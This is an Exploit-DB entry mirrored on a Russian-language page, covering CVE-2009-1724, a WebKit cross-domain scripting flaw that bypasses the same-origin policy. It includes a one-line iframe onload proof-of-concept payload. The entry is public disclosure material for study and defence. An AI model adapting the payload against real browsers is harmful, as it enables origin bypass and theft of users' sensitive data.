- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 33047
- Проверка EDB
-
- Пройдено
- Автор
- GARETH HAYES
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2009-1724
- Дата публикации
- 2009-05-19
HTML:
source: https://www.securityfocus.com/bid/35441/info
WebKit is prone to a cross-domain scripting vulnerability.
A remote attacker can exploit this vulnerability to bypass the same-origin policy and obtain potentially sensitive information or launch spoofing attacks against other sites. Other attacks are also possible.
<iframe src="http://www.example.com/safari/safari2.html" onload="this.contentWindow.parent=this.contentWindow.top=alert;"></iframe>- Источник
- www.exploit-db.com
